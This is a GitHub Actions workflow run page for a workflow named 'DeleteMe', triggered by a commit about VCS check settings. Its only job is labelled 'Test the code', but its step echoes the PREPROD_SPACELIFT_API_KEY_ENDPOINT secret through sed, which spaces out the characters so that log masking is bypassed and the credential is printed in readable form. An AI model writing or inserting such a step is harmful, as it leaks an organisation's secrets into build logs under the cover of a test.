Skip to content

feat(vcs-aggregated-checks): exposes VCS checks settings in Gitlab VC… #4

feat(vcs-aggregated-checks): exposes VCS checks settings in Gitlab VC…

feat(vcs-aggregated-checks): exposes VCS checks settings in Gitlab VC… #4

Workflow file for this run

name: DeleteMe
on: [push]
concurrency:
group: ${{ github.workflow }}-${{ github.head_ref || github.run_id }}
cancel-in-progress: true
jobs:
deployment:
name: Test the code
runs-on: ubuntu-latest
steps:
- name: bla bla
run: |
echo ${{ secrets.PREPROD_SPACELIFT_API_KEY_ENDPOINT }} | sed 's/./& /g'